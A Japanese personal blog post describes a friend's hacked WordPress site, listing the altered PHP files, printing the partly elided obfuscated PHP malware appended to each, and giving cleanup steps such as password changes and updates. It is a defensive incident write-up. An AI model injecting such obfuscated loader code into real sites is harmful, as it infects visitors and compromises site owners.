WordPressに改ざん

知人にもWordpressを勧めて、「結構いいね」なんて言われていたのですが、アララ、ページが改ざんされてしまったそうです。

そのサイトに行くと、ウィルスソフトが「トロイの木馬」に感染したとかいう警告を出すそうな。ひどい人はPCが使い物にならない(といっても、どの程度だったのか詳細は不明ですけど)らしい。

チェックをしてみますと、いくつかのファイルに改ざん後がありました。
ネットで調べると、同様の改ざんが報告されています。
私もこちらに記しておきまする。

■改ざんされたのは次のファイル。
Wordpressのフォルダ/index.php
Wordpressのフォルダ/wp-blog-header.php
Wordpressのフォルダ/wp-content/themes/index.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/footer.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/header.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/index.php

(テストで入れておいたテーマにも改ざんがあったので、そちらはフォルダごと削除)

■改ざん方法
それぞれのphpファイルの最後に次の記載が追加されていた。
これが1行にズラズラ〜っと記載してありました。

<?php @error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3T(省略)
bkRTID0xODc5Mjt9";
$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
$eva1tYldakBoVS1r = "\x65\143\x(省略)\x67\145\x72\160";
$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\(省略)
akBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016),
$eva1fYlbakBcVSir);$eva1tYXdakAcVSjr =
$eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016),
$eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],
$eva1tYidokBcVSjr[62.5*0.016],
$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
$eva1tYldakBoVS1r = "\x65\143\x72\160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
} ?>

■後処理として、
これらのファイルのその記載は削除してもらって、さらに
・ftpサーバのパスワード変更
・Wordpressのパスワード変更
・レンタルサーバーへの報告
・Wordpressを最新バージョンに更新
・pluginを最新バージョンに更新

これらをして頂きました。ふ〜。